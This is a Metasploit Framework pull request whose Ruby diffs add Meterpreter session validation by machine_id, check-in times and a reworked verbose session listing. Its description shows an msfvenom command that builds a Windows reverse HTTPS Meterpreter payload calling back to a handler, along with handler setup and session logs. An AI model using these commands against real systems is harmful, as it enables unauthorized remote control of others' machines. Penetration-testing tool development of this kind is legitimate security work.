### PR TITLE
Track machine_id and drop "dead" sessions during initialization

### DIFF
--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -536,6 +536,7 @@ class ReadableText
       ]
 
     columns << 'Via' if verbose
+    columns << 'CheckIn' if verbose
     columns << 'PayloadId' if verbose
 
     tbl = Rex::Ui::Text::Table.new(
@@ -554,11 +555,16 @@ class ReadableText
 
       row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ]
       if session.respond_to? :platform
-        row[1] += " " + session.platform
+        row[1] << (" " + session.platform)
       end
 
       if verbose
         row << session.via_exploit.to_s
+        if session.respond_to?(:last_checkin) && session.last_checkin
+          row << "#{(Time.now.to_i - session.last_checkin.to_i)}s"
+        else
+          row << ''
+        end
         row << session.payload_uuid.to_s
       end
 

--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -527,6 +527,8 @@ class ReadableText
     indent = opts[:indent] || DefaultIndent
     col = opts[:col] || DefaultColumnWrap
 
+    return dump_sessions_verbose(framework, opts) if verbose
+
     columns =
       [
         'Id',
@@ -534,10 +536,6 @@ class ReadableText
         'Information',
         'Connection'
       ]
-
-    columns << 'Via' if verbose
-    columns << 'CheckIn' if verbose
-    columns << 'PayloadId' if verbose
 
     tbl = Rex::Ui::Text::Table.new(
       'Indent'  => indent,
@@ -558,20 +556,63 @@ class ReadableText
         row[1] << (" " + session.platform)
       end
 
-      if verbose
-        row << session.via_exploit.to_s
-        if session.respond_to?(:last_checkin) && session.last_checkin
-          row << "#{(Time.now.to_i - session.last_checkin.to_i)}s"
-        else
-          row << ''
-        end
-        row << session.payload_uuid.to_s
-      end
-
       tbl << row
     }
 
     return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
+  end
+
+  # Dumps the list of active sessions in verbose mode
+  #
+  # @param framework [Msf::Framework] the framework to dump.
+  # @param opts [Hash] the options to dump with.
+  # @option opts :session_ids [Array] the list of sessions to dump (no
+  #   effect).
+  # @return [String] the formatted list of sessions.
+  def self.dump_sessions_verbose(framework, opts={})
+    ids = (opts[:session_ids] || framework.sessions.keys).sort
+
+    out = "Active sessions\n" +
+          "===============\n\n"
+
+    if framework.sessions.length == 0
+      out << "No active sessions.\n"
+      return out
+    end
+
+    framework.sessions.each_sorted do |k|
+      session = framework.sessions[k]
+
+      sess_info    = session.info.to_s
+      sess_id      = session.sid.to_s
+      sess_tunnel  = session.tunnel_to_s + " (#{session.session_host})"
+      sess_via     = session.via_exploit.to_s
+      sess_type    = session.type.to_s
+      sess_uuid    = session.payload_uuid.to_s
+      sess_checkin = "<none>"
+      sess_machine_id = session.machine_id.to_s
+
+      if session.respond_to? :platform
+        sess_type << (" " + session.platform)
+      end
+
+      if session.respond_to?(:last_checkin) && session.last_checkin
+        sess_checkin = "#{(Time.now.to_i - session.last_checkin.to_i)}s Ago @ #{session.last_checkin.to_s}"
+      end
+
+      out << "  Session ID: #{sess_id}\n"
+      out << "        Type: #{sess_type}\n"
+      out << "        Info: #{sess_info}\n"
+      out << "      Tunnel: #{sess_tunnel}\n"
+      out << "         Via: #{sess_via}\n"
+      out << "        UUID: #{sess_uuid}\n"
+      out << "   MachineID: #{sess_machine_id}\n"
+      out << "     CheckIn: #{sess_checkin}\n"
+      out << "\n"
+    end
+
+    out << "\n"
+    return out
   end
 
   # Dumps the list of running jobs.

--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -597,7 +597,7 @@ class ReadableText
       end
 
       if session.respond_to?(:last_checkin) && session.last_checkin
-        sess_checkin = "#{(Time.now.to_i - session.last_checkin.to_i)}s Ago @ #{session.last_checkin.to_s}"
+        sess_checkin = "#{(Time.now.to_i - session.last_checkin.to_i)}s ago @ #{session.last_checkin.to_s}"
       end
 
       out << "  Session ID: #{sess_id}\n"

--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -252,10 +252,10 @@ class Meterpreter < Rex::Post::Meterpreter::Client
   #
   # Terminates the session
   #
-  def kill
+  def kill(dirty=false)
     begin
-      cleanup_meterpreter
-      self.sock.close
+      cleanup_meterpreter(dirty)
+      self.sock.close if self.sock
     rescue ::Exception
     end
     framework.sessions.deregister(self)

--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -299,6 +299,24 @@ class Meterpreter < Rex::Post::Meterpreter::Client
   end
 
   #
+  # Validate session information by checking for a machine_id response
+  #
+  def is_valid_session?(timeout=10)
+    return true if self.machine_id
+
+    begin
+      self.machine_id = self.core.machine_id(timeout)
+      return true
+    rescue ::Rex::Post::Meterpreter::RequestError
+      # This meterpreter doesn't support core_machine_id
+      return true
+    rescue ::Exception => e
+      dlog("Session #{self.sid} did not respond to validation request #{e.class}: #{e}")
+    end
+    false
+  end
+
+  #
   # Populate the session information.
   #
   # Also reports a session_fingerprint note for host os normalization.

--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -252,12 +252,13 @@ class Meterpreter < Rex::Post::Meterpreter::Client
   #
   # Terminates the session
   #
-  def kill(dirty=false)
+  def kill
     begin
-      cleanup_meterpreter(dirty)
+      cleanup_meterpreter
       self.sock.close if self.sock
     rescue ::Exception
     end
+    # deregister will actually trigger another cleanup
     framework.sessions.deregister(self)
   end
 
@@ -466,6 +467,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client
   attr_accessor :binary_suffix
   attr_accessor :console # :nodoc:
   attr_accessor :skip_ssl
+  attr_accessor :skip_cleanup
   attr_accessor :target_id
 
 protected

--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -76,7 +76,10 @@ module MeterpreterOptions
     end
 
     # Terminate the session without cleanup if it did not validate
-    session.kill(true) if not valid
+    if not valid
+      session.skip_cleanup = true
+      session.kill
+    end
 
     }
 

--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -12,6 +12,7 @@ module MeterpreterOptions
     register_advanced_options(
       [
         OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]),
+        OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]),
         OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']),
         OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']),
         OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
@@ -35,44 +36,46 @@ module MeterpreterOptions
 
     session.init_ui(self.user_input, self.user_output)
 
-    if (datastore['AutoLoadStdapi'] == true)
+    valid = true
 
-      session.load_stdapi
-
-      if datastore['AutoSystemInfo']
-        session.load_session_info
+    if datastore['AutoVerifySession'] == true
+      if not session.is_valid_session?
+        print_error("Meterpreter session #{session.sid} is not valid and will be closed")
+        valid = false
       end
+    end
 
-=begin
-      admin = false
-      begin
-        ::Timeout.timeout(30) do
-          if session.railgun and session.railgun.shell32.IsUserAnAdmin()["return"] == true
-            admin = true
-            session.info += " (ADMIN)"
-          end
+    if valid
+
+      if datastore['AutoLoadStdapi'] == true
+
+        session.load_stdapi
+
+        if datastore['AutoSystemInfo']
+          session.load_session_info
         end
-      rescue ::Exception
+
+        if session.platform =~ /win32|win64/i
+          session.load_priv rescue nil
+        end
       end
-=end
-      if session.platform =~ /win32|win64/i
-        session.load_priv rescue nil
+
+      if session.platform =~ /android/i
+        if datastore['AutoLoadAndroid']
+          session.load_android
+        end
+      end
+
+      [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
+        if (datastore[key].empty? == false)
+          args = Shellwords.shellwords( datastore[key] )
+          print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'")
+          session.execute_script(args.shift, *args)
+        end
       end
     end
 
-    if session.platform =~ /android/i
-      if datastore['AutoLoadAndroid']
-        session.load_android
-      end
-    end
-
-    [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
-      if (datastore[key].empty? == false)
-        args = Shellwords.shellwords( datastore[key] )
-        print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'")
-        session.execute_script(args.shift, *args)
-      end
-    end
+    session.kill if not valid
 
     }
 

--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -75,7 +75,8 @@ module MeterpreterOptions
       end
     end
 
-    session.kill if not valid
+    # Terminate the session without cleanup if it did not validate
+    session.kill(true) if not valid
 
     }
 

--- a/lib/msf/core/session.rb
+++ b/lib/msf/core/session.rb
@@ -389,6 +389,10 @@ module Session
   #
   attr_accessor :payload_uuid
   #
+  # The unique machine identifier for the host that created this session
+  #
+  attr_accessor :machine_id
+  #
   # The actual exploit module instance that created this session
   #
   attr_accessor :exploit

--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -464,6 +464,10 @@ class Client
   # A list of the commands
   #
   attr_reader :commands
+  #
+  # The timestamp of the last received response
+  #
+  attr_accessor :last_checkin
 
 protected
   attr_accessor :parser, :ext_aliases # :nodoc:

--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -84,8 +84,8 @@ class Client
   #
   # Cleans up the meterpreter instance, terminating the dispatcher thread.
   #
-  def cleanup_meterpreter(dirty)
-    if not dirty
+  def cleanup_meterpreter
+    if not self.skip_cleanup
       ext.aliases.each_value do | extension |
         extension.cleanup if extension.respond_to?( 'cleanup' )
       end
@@ -93,7 +93,7 @@ class Client
 
     dispatcher_thread.kill if dispatcher_thread
 
-    if not dirty
+    if not self.skip_cleanup
       core.shutdown rescue nil
     end
 

--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -84,12 +84,19 @@ class Client
   #
   # Cleans up the meterpreter instance, terminating the dispatcher thread.
   #
-  def cleanup_meterpreter
-    ext.aliases.each_value do | extension |
-      extension.cleanup if extension.respond_to?( 'cleanup' )
+  def cleanup_meterpreter(dirty)
+    if not dirty
+      ext.aliases.each_value do | extension |
+        extension.cleanup if extension.respond_to?( 'cleanup' )
+      end
     end
+
     dispatcher_thread.kill if dispatcher_thread
-    core.shutdown rescue nil
+
+    if not dirty
+      core.shutdown rescue nil
+    end
+
     shutdown_passive_dispatcher
   end
 

--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -245,14 +245,16 @@ class ClientCore < Extension
     return true
   end
 
-  def machine_id
+  def machine_id(timeout=nil)
     request = Packet.create_request('core_machine_id')
 
-    response = client.send_request(request)
+    args = [ request ]
+    args << timeout if timeout
 
-    id = response.get_tlv_value(TLV_TYPE_MACHINE_ID)
-    # TODO: Determine if we're going to MD5/SHA1 this
-    return Rex::Text.md5(id)
+    response = client.send_request(*args)
+
+    mid = response.get_tlv_value(TLV_TYPE_MACHINE_ID)
+    return Rex::Text.md5(mid)
   end
 
   def transport_change(opts={})


### PR DESCRIPTION
The patch brings together a few related items:
- Pulls in PR #5295 as a base due to potential conflicts
- Reworks session verbose listing to no longer use tables (much more readable)
- Exposes a timeout parameter for the `session.core.machine_id` method
- Adds `AutoVerifySession` and enables it by default, which vets that sessions are responsive, and closes them otherwise.

The `AutoVerifySession` option causes Metasploit to query the machine_id first thing during Meterpreter session setup (post-session creation). If the remote Meterpreter doesn't respond with a machine_id or an error message, the session is considered dead and will be closed.

This is necessary to support the `StagerVerifySSLCert` functionality, since otherwise we end up with dead sessions. Testing this looks something like:

```
$ ./msfvenom -f exe -p windows/meterpreter/reverse_winhttps LHOST=192.168.0.3 LPORT=4444 HandlerSSLCert=./test.pem StagerVerifySSLCert=true -o /scratch/r_https_verify.exe
$ ./msfconsole -q

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_winhttps
msf exploit(handler) > set LHOST 192.168.0.3
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] 192.168.0.6:7767 (UUID: be95589458bab6e6/x86=1/windows=1/2015-05-04T08:19:10Z) Staging Native payload ...
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.6:7767) at 2015-05-04 03:29:10 -0500
[-] Meterpreter session 1 is not valid and will be closed
[*] 192.168.0.6 - Meterpreter session 1 closed.
```

Before a session is scrubbed, it will show with missing fields in the `sessions -l -v` output:

```
Active sessions
===============

  Session ID: 2
        Type: meterpreter x86/win32
        Info: 
      Tunnel: 192.168.0.3:4444 -> 192.168.0.6:7772 (192.168.0.6)
         Via: exploit/multi/handler
        UUID: be95589458bab6e6/x86=1/windows=1/2015-05-04T08:19:10Z
   MachineID: 
     CheckIn: <none>
```

If we configure out handler with the right SSL certificate, the session stays alive:

```
msf exploit(handler) > set HandlerSSLCert ./test.pem
msf exploit(handler) > set StagerVerifySSLCert true
msf exploit(handler) > jobs  -K
msf exploit(handler) > run -j

[*] Meterpreter will verify SSL Certificate with SHA1 hash 438b489f80da528f1b4d476b1937c85eaf433870
[*] Exploit running as background job.

[*] Starting the payload handler...
[*] 192.168.0.6:7780 (UUID: be95589458bab6e6/x86=1/windows=1/2015-05-04T08:19:10Z) Staging Native payload ...
[*] Meterpreter will verify SSL Certificate with SHA1 hash 438b489f80da528f1b4d476b1937c85eaf433870
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.6:7780) at 2015-05-04 03:34:04 -0500

msf exploit(handler) > sessions -l -v

Active sessions
===============

  Session ID: 1
        Type: meterpreter x86/win32
        Info: z420\Developer @ Z420
      Tunnel: 192.168.0.3:4444 -> 192.168.0.6:7780 (192.168.0.6)
         Via: exploit/multi/handler
        UUID: be95589458bab6e6/x86=1/windows=1/2015-05-04T08:19:10Z
   MachineID: 527ff1340d3e81e2731522564aefa118
     CheckIn: 1s ago @ 2015-05-04 03:34:34 -0500

```
